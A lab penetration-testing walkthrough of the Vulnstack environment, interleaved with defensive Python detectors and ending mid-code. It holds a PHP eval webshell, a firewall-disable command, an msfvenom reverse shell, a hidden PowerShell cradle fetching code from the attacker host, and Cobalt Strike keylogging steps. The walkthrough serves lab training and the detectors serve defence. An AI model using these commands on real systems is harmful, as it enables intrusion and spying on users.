- Environment preparation
- Building the environment
- Configuring the target machines
- Configuring win2008
- Configuring win7
- Information gathering
- nmap information gathering
- Directory brute-forcing
- Probing the website
- Probing phpmyadmin
- Probing beifen.rar
- Website back end
- Penetration attack
- getshell
- Collecting system information
- Uploading the trojan
- Reverse shell back to msf
- win7 information gathering
- Adding a route
- Intranet penetration
- Intranet host discovery
- Starting a proxy in msf
- Modifying proxychains
- nmap intranet host discovery
- Using Cobalt Strike
- Setting up a listener
- Generating a Web Delivery
- Taking the host
- Entering the command line
- Current user privileges
- File management
- Process management
- Screenshots
- Desktop control
- Keylogging
- Intranet information gathering
- Port scanning
- Vulnerability scanning
- Domain information gathering
- Collecting account passwords
- Dumping system passwords directly from memory
- Using LaZagne to find all locally stored passwords
- Logging in to other hosts with the domain account
- Building a tunnel
- target
- Results topology
Environment preparation
1: Download address: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
2: Environment overview:
There are three machines in total: win7 is the externally facing web server, and win2003 and win2008 are intranet machines
3: Network topology
Building the environment
1: Connect all three machines to the vm1 network adapter
2: Disable VMware's DHCP on the vm1 adapter
3: Add a second network adapter to win7 (win2003 and win2008 have only one adapter), using NAT
4: kali uses NAT
5: Take snapshots of the machines above
6: Power on all three target machines
Configuring the target machines
The configuration steps below are recommended; otherwise the experiment gets very annoying.
The default password for the three target machines is hongrisec@2019
Configuring win2008
1: Reset the password
When logging in to win2008 you are told the password has expired and must be reset; just set a new one. Note that it is liukaifeng01's password you are changing
2: Don't get itchy fingers
After booting you will see a prompt asking you to restart the computer. Don't agree; choose to restart later and then ignore it
3: Recommended: set the administrator account to never expire
Configuring win7
1: About removing devices
Some people habitually remove devices such as "Printer", "Sound Card" and "CD/DVD (IDE)", but don't do that on win7, and above all don't remove the "Printer", or phpstudy will fail to start
2: Don't get itchy fingers
After booting you will see a prompt asking you to restart the computer. Don't agree; choose to restart later and then ignore it
3: Start phpstudy
File path: C:\phpStudy\phpStudy.exe
4: Check the IP
Your IP may be fine, but my machine had a problem: with one adapter on VM1 and one on NAT it could not obtain a NAT address, while the other machines obtained NAT addresses normally. For a fix see vmware网卡排雷 (VMware network adapter troubleshooting)
The workaround used here is three adapters: NAT then works normally, while the bridged adapter gets 192.254.124.253 and is unusable, which happens to suit the lab environment:
5: Confirm the web service is up
Entering win7's external IP shows the phpStudy probe page, which means it is working. If the network configuration is fine but the page still cannot be reached, try setting a firewall rule and then restart phpStudy
Information gathering
nmap information gathering
The target has ports 80 and 3306 open, so look at the website first
Opening the website, the first page seen is as follows
The following issues exist:
HTTP plaintext transmission
Server fingerprint disclosure (OS, Apache and PHP versions)
phpinfo information disclosure
MySQL database weak password
MySQL database password brute-forcing
phpstudy backdoor (to be checked)
Directory brute-forcing
Run a pass with 御剑 (Yujian directory scanner)
Probing the website
Visit the directories found by 御剑 one by one:
Probing phpmyadmin
Logged in to phpmyadmin successfully with the weak password root and saw a table named newyxcms (cms: content management system)
The following issue exists:
phpmyadmin is reachable from the external network (by default only localhost may access it)
It is basically confirmed that the site runs yxcms; try accessing it. From the "公告信息" (announcements) we learn that the back-end credentials are admin:123456 and the address is /index.php?r=admin
Probing beifen.rar
Confirmed that the site version is 1.2.1, so one could look for vulnerabilities in this version, but since the back-end credentials were already seen in the announcements there is no need to bother
Website back end
In "前台模板" (front-end templates) you can see that templates are editable. Templates usually allow custom PHP files, and if a custom PHP file can be written, a one-line webshell can be dropped directly
Penetration attack
getshell
1: Write the one-line webshell
<?php @eval($_REQUEST[777])?>
2: Find the path where info.php is located
protected/apps/default/view
3: Connect with 蚁剑 (AntSword)
http://192.168.40.128/yxcms/protected/apps/default/view/default/info.php
With the default UTF8 encoding setting some content shows up garbled, so GBK encoding is used here
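What the three steps above leave on disk is a template file whose only content is a code-execution call fed by request input. The following Python is an added example for defenders, not code from the writeup or from yxcms: it baselines the SHA-256 of every PHP file under a webroot so that a template edit shows up as a modified file, and it scans the same files for the eval-of-superglobal pattern of the one-liner above. The directory layout protected/apps/default/view/default/info.php mirrors the path named in the writeup; the file contents and the temporary webroot are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Heuristic for one-line PHP webshells: a code-execution function fed directly from a superglobal.
# Written for this example; a real scanner would carry a much larger rule set.
EXEC_FUNCS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
USER_INPUT = r"\$_(?:REQUEST|POST|GET|COOKIE|SERVER)\s*\["
WEBSHELL_RE = re.compile(
    r"@?\s*\b" + EXEC_FUNCS + r"\s*\(\s*(?:base64_decode\s*\(\s*)?" + USER_INPUT, re.IGNORECASE
)


def scan_php_source(source: str) -> List[Tuple[int, str]]:
    """Return (line number, stripped line) for each line that matches the webshell heuristic."""
    return [(n, line.strip()) for n, line in enumerate(source.splitlines(), 1)
            if WEBSHELL_RE.search(line)]


def php_files(root: str):
    """Yield (relative posix path, absolute path) for every .php file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/"), full


def snapshot_tree(root: str) -> Dict[str, str]:
    """Baseline: SHA-256 of every PHP file, keyed by relative path."""
    digests = {}
    for rel, full in php_files(root):
        with open(full, "rb") as fh:
            digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_snapshots(before: Dict[str, str], after: Dict[str, str]) -> Dict[str, List[str]]:
    """Files that appeared or changed since the baseline (the kind of change a template edit makes)."""
    return {"added": sorted(p for p in after if p not in before),
            "modified": sorted(p for p in after if p in before and before[p] != after[p])}


def scan_tree(root: str) -> Dict[str, List[Tuple[int, str]]]:
    """Signature scan over the whole webroot."""
    findings = {}
    for rel, full in php_files(root):
        with open(full, encoding="utf-8", errors="replace") as fh:
            hits = scan_php_source(fh.read())
        if hits:
            findings[rel] = hits
    return findings


def demo() -> dict:
    """Constructed webroot: baseline it, tamper with a template as in the writeup, detect both ways."""
    with tempfile.TemporaryDirectory() as root:
        view = os.path.join(root, "protected", "apps", "default", "view", "default")
        os.makedirs(view)
        template = os.path.join(view, "info.php")
        with open(template, "w", encoding="utf-8") as fh:
            fh.write("<?php echo htmlspecialchars($title); ?>\n")
        with open(os.path.join(view, "index.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php $page = (int)($_GET['page'] ?? 1); include 'info.php'; ?>\n")
        baseline = snapshot_tree(root)
        # Simulated tampering: the template is overwritten with the one-liner shown above.
        with open(template, "w", encoding="utf-8") as fh:
            fh.write("<?php @eval($_REQUEST[777])?>\n")
        return {"changed": diff_snapshots(baseline, snapshot_tree(root)),
                "findings": scan_tree(root)}


if __name__ == "__main__":
    print(demo())
```

The two checks complement each other: the hash diff catches any edit to a template regardless of content, while the signature scan points at the line that matters. In a deployment the baseline would be taken from a known-good release and re-checked on a schedule, and write access to the template directory would be removed from the web server account so that the "edit template" feature cannot reach the file system at all.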
Collecting system information
Disable the firewall: netsh advfirewall set allprofiles state off
Uploading the trojan
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.3.139.50 lport=4444 -f exe -o re.exe
Reverse shell back to msf
1: msf listener
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 10.3.139.50
run
2: Launch the trojan
win7 information gathering
The meterpreter session obtained at this point comes from win7
1: Collect patch information
run post/windows/gather/enum_patches
2: Installed software information; nmap is found, so nmap can be used directly to scan the intranet 52 subnet
run post/windows/gather/enum_applications
Adding a route
Add a route: run autoroute -s 192.168.52.0 255.255.255.0
View routes: run autoroute -p
Intranet penetration
Intranet host discovery
Using an ARP scan, three hosts are found on the intranet
run post/windows/gather/arp_scanner rhosts=192.168.52.0/24
Starting a proxy in msf
meterpreter > background    (send the session to the background)
use auxiliary/server/socks5
show options
run
Modifying proxychains
sudo vim /etc/proxychains.conf
nmap intranet host discovery
The nmap scan was a bust
No matter; remember that nmap was found on win7 during msf information gathering? Use 蚁剑 (AntSword) to run the scan.
Since nmap alone still cannot do comprehensive host discovery, the results of msf's host discovery are used for the scan
Using Cobalt Strike
The previous steps went very badly, so switch to Cobalt Strike. The precondition for using cs is having a shell, i.e. once 蚁剑 has obtained a shell, cs can be used
Start the cs server on kali
sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456 &
Start the cs client on kali
sudo chmod +x start.sh
./start.sh
After restarting kali the cs login is still refused; today is really too hard ::>_<::
Troubleshooting note:
Don't run the cs server in the background when starting it, and it works
(Though on another kali I was able to put cs in the background and use it normally)
For various reasons the first attempt did not go well; this is now the second attempt. The four IPs below need not be memorized; they are only here to explain why some screenshots show inconsistent IPs. The point is to understand the logic of the operations
kali's IP (originally) 192.168.40.147 -----> (now) 10.3.139.50
win7's IP (originally) 192.168.40.128 -------> (now) 10.3.139.51
Setting up a listener
Because win7 is a web server, HTTP is used for the connection. This means cs cannot reach out to the compromised host; the compromised host has to connect to cs itself to receive commands. By default the compromised host checks in to the cs server every 60 seconds to download commands, and after executing them it sends the results back to the server in an HTTP POST.
(Please treat the IP below as 10.3.139.50)
Generating a Web Delivery
Generate the trojan, as a file or as a command
It then generates a powershell command such as
#powershell is a built-in Windows component
#no file needs to be uploaded to the target server's disk
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.147:80/a'))"
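The command above is the classic download-and-execute cradle: a hidden, profile-less PowerShell that fetches a script over HTTP and hands it to Invoke-Expression. The Python below is an added detection example, not part of the writeup or of Cobalt Strike: it scores process-creation command lines (Sysmon Event ID 1 style, constructed here) for the cradle's indicators, extracts the staging URL, and also decodes a -EncodedCommand variant (base64 of UTF-16LE) before matching, because that is how the same cradle usually looks once it has been hidden. The event records and the backup.ps1 path are constructed sample data; the only real values are the cradle and IP taken from the line above.

```python
import base64
import re
from typing import Dict, List, Optional

# Indicators present in the cradle above and its common variants. Heuristics written for this
# example, not an exhaustive rule set.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xec(?:utionpolicy)?|p)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"net\.webclient\)?\s*\.\s*download(?:string|file|data)", re.I),
}
EVASION = {"hidden_window", "no_profile", "non_interactive", "bypass_policy"}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script passed via -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> Dict:
    """Score one process-creation command line against the cradle indicators."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    url = URL_RE.search(text)
    # A download cradle is suspicious on its own; IEX only together with an evasion switch.
    suspicious = "download_cradle" in hits or (
        "invoke_expression" in hits and bool(EVASION & set(hits))
    )
    return {"cmdline": cmdline, "indicators": hits, "url": url.group(0) if url else None,
            "decoded": decoded, "suspicious": suspicious}


def triage_process_events(events: List[Dict[str, str]]) -> List[Dict]:
    """Analyze PowerShell launches only; other images pass through as not suspicious."""
    results = []
    for ev in events:
        if ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            results.append(analyze_command_line(ev["cmdline"]))
        else:
            results.append({"cmdline": ev["cmdline"], "indicators": [], "url": None,
                            "decoded": None, "suspicious": False})
    return results


def sample_events() -> List[Dict[str, str]]:
    """Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry."""
    cradle = "IEX ((new-object net.webclient).downloadstring('http://192.168.40.147:80/a'))"
    encoded = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {"image": ps, "cmdline": f'powershell.exe -nop -w hidden -c "{cradle}"'},
        {"image": ps, "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
        {"image": ps, "cmdline": f"powershell.exe -nop -w hidden -enc {encoded}"},
        {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    ]


if __name__ == "__main__":
    for r in triage_process_events(sample_events()):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['indicators']} url={r['url']}")
```

The scheduled backup script is scored but not flagged: an execution-policy bypass alone is common in administration, which is why the rule requires either the download cradle or IEX combined with an evasion switch. The same idea scales to PowerShell script block logging (Event ID 4104), where the decoded script is already available and the URL extraction is the part worth keeping.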
Taking the host
Run the command in 蚁剑's virtual terminal, and the host checks in to cs
As you can see, the compromised host connects to the server only every 60 seconds, which is too slow for an experiment; adjust the interval. It takes 60 seconds to take effect
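The fixed 60-second check-in described above is also what a network defender can key on: requests from one client to one server whose inter-arrival times barely vary. The Python below is an added example, not code from the writeup: it groups constructed proxy log lines by client/server pair, measures the median gap and its relative spread (median absolute deviation over median), and flags pairs with enough requests at a near-constant interval. The log format, the wiki.internal host and the browsing timestamps are constructed; the two lab IPs come from the writeup. A beacon configured with jitter widens the spread, so the dispersion threshold is a tuning knob, not a fixed truth.

```python
import statistics
from datetime import datetime, timedelta
from typing import Dict, List


def build_sample_log() -> List[str]:
    """Constructed proxy log, not real data: '<ISO time> <client> <method> <server:port> <uri>'."""
    base = datetime(2020, 8, 22, 17, 0, 0)
    lines = []
    # Staged check-ins from the web server to the team server (IPs as used in the writeup):
    # one GET every 60 s with a second or two of drift.
    for off in (0, 60, 121, 180, 240, 299, 360, 421, 480, 540, 599, 660):
        lines.append(f"{(base + timedelta(seconds=off)).isoformat()} 10.3.139.51 GET 10.3.139.50:80 /a")
    # A person browsing an internal wiki (constructed host name): bursts, then long pauses.
    for off in (0, 7, 9, 45, 130, 131, 300, 420):
        lines.append(f"{(base + timedelta(seconds=off)).isoformat()} 10.3.139.60 GET wiki.internal:80 /index")
    return sorted(lines)  # time-ordered, as a real log would be


def group_by_pair(lines: List[str]) -> Dict[str, List[datetime]]:
    """Collect request timestamps per client->server pair."""
    series: Dict[str, List[datetime]] = {}
    for line in lines:
        ts, client, _method, server, _uri = line.split()
        series.setdefault(f"{client}->{server}", []).append(datetime.fromisoformat(ts))
    return series


def periodicity(times: List[datetime]) -> Dict[str, float]:
    """Median inter-request gap and its relative spread (MAD / median); near 0 means clockwork."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = statistics.median(gaps)
    mad = statistics.median(abs(g - med) for g in gaps)
    return {"checkins": len(times), "median_interval": med,
            "dispersion": mad / med if med else float("inf")}


def detect_beacons(lines: List[str], min_checkins: int = 8, max_dispersion: float = 0.1) -> Dict[str, Dict]:
    """Flag pairs with enough requests at a near-constant interval; short series are never flagged."""
    results = {}
    for pair, times in group_by_pair(lines).items():
        if len(times) < 2:
            continue
        stats = periodicity(times)
        stats["flagged"] = stats["checkins"] >= min_checkins and stats["dispersion"] <= max_dispersion
        results[pair] = stats
    return results


if __name__ == "__main__":
    for pair, s in detect_beacons(build_sample_log()).items():
        print(pair, s)
```

The browsing series has as many requests as the minimum requires but a spread close to 1, so only the check-in series is flagged; that is the point of using a dispersion measure rather than request count alone. Tiny request and response sizes with a fixed URI path strengthen the same signal in practice.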
[The content under the third-level headings below is for my own reference; readers can ignore it]
Entering the command line
Every graphical operation is echoed in the command line, and commands can also be typed directly in the command line
Current user privileges
File management
beacon|right-click|Explore|File Browser
Process management
beacon|right-click|Explore|Process List
Screenshots
Take a screenshot
beacon|right-click|Explore|Screenshots
View screenshots
View|Screenshots
Desktop control
beacon> desktop
Keylogging
Record keystrokes
beacon|right-click|Explore|Process List|Log Keystrokes
View recorded keystrokes
View Keystrokes
When keylogging it is better to migrate the injected process, but don't migrate into a SYSTEM process: SYSTEM is the machine account, it cannot log on to the system, and so naturally its keystrokes cannot be recorded
Intranet information gathering
Port scanning
beacon|right-click|Explore|Port Scan
What did that even scan? It only found myself
While checking the network it turned out win7 had lost connectivity to the other machines; after fixing that, scan again
That's it? Back to nmap! nmap works normally under cs
Vulnerability scanning
The scan is a bit slow; be patient and the results are rewarding (since using msf to take win7 earlier did not work well, this is scanning only, with no hand-off to msf)
Scan 192.168.52.141
beacon> shell nmap --script=vuln 192.168.52.141
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.141
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 17:57 ?D1ú±ê×?ê±??
[+] received output:
Nmap scan report for 192.168.52.141
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp open multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1030/tcp open iad1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6002/tcp open X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8099/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:70:62:5D (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 125.97 seconds
Scan 192.168.52.138
beacon> shell nmap --script=vuln 192.168.52.138
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.138
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 18:02 ?D1ú±ê×?ê±??
[+] received output:
Nmap scan report for 192.168.52.138
Host is up (0.00s latency).
Not shown: 982 filtered ports
PORT STATE SERVICE
53/tcp open domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp open kerberos-sec
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp open ldap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp open kpasswd5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp open http-rpc-epmap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp open ldapssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3268/tcp open globalcatLDAP
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3269/tcp open globalcatLDAPssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
49154/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49161/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49167/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:AA:F7:D1 (VMware)
Host script results:
| smb-double-pulsar-backdoor:
| VULNERABLE:
| Double Pulsar SMB Backdoor
| State: VULNERABLE
| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
| The Double Pulsar SMB backdoor was detected running on the remote machine.
|
| Disclosure date: 2017-04-14
| References:
| https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
| https://github.com/countercept/doublepulsar-detection-script
|_ https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 153.58 seconds
Scan 192.168.52.143:
beacon> shell nmap --script=vuln 192.168.52.143
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.143
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 18:08 ?D1ú±ê×?ê±??
[+] received output:
Nmap scan report for www.qiyuanxuetang.net (192.168.52.143)
Host is up (0.00s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.qiyuanxuetang.net
| Found the following possible CSRF vulnerabilities:
|
| Path: http://www.qiyuanxuetang.net:80/
| Form id:
| Form action: /l.php#bottom
|
| Path: http://www.qiyuanxuetang.net:80/l.php
| Form id:
|_ Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpinfo.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
| VULNERABLE:
| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
| State: VULNERABLE (Exploitable)
| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
| Extra information:
|
| Vulnerable files with proof of concept:
| http://www.qiyuanxuetang.net/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.qiyuanxuetang.net
| References:
| https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_ http://php.net/manual/en/reserved.variables.server.php
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-sql-injection:
| Possible sqli for queries:
| http://www.qiyuanxuetang.net:80/l.php?act=Function%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?act=Function%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| Possible sqli for forms:
| Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
| funName
| Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
|_ funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1026/tcp open LSA-or-nterm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1027/tcp open IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1248/tcp open hermes
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-double-pulsar-backdoor:
| VULNERABLE:
| Double Pulsar SMB Backdoor
| State: VULNERABLE
| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
| The Double Pulsar SMB backdoor was detected running on the remote machine.
|
| Disclosure date: 2017-04-14
| References:
| https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
| https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_ https://github.com/countercept/doublepulsar-detection-script
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 138.36 seconds
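The three scans above return a lot of text for a handful of actionable facts: which host, which SMB script reports VULNERABLE, which CVE. The Python below is an added example, not code from the writeup or from Nmap: a parser for this console output that skips the Cobalt Strike noise lines, tracks whether a script block belongs to a port or to the host, and pulls out state, risk factor and CVE identifiers per NSE script. The embedded SAMPLE_OUTPUT is a trimmed excerpt of the 192.168.52.141 scan above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Excerpt of the 192.168.52.141 scan shown above, trimmed; "beacon>" and "[+]" lines are
# Cobalt Strike console noise the parser has to skip.
SAMPLE_OUTPUT = """\
beacon> shell nmap --script=vuln 192.168.52.141
[+] received output:
Nmap scan report for 192.168.52.141
PORT STATE SERVICE
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
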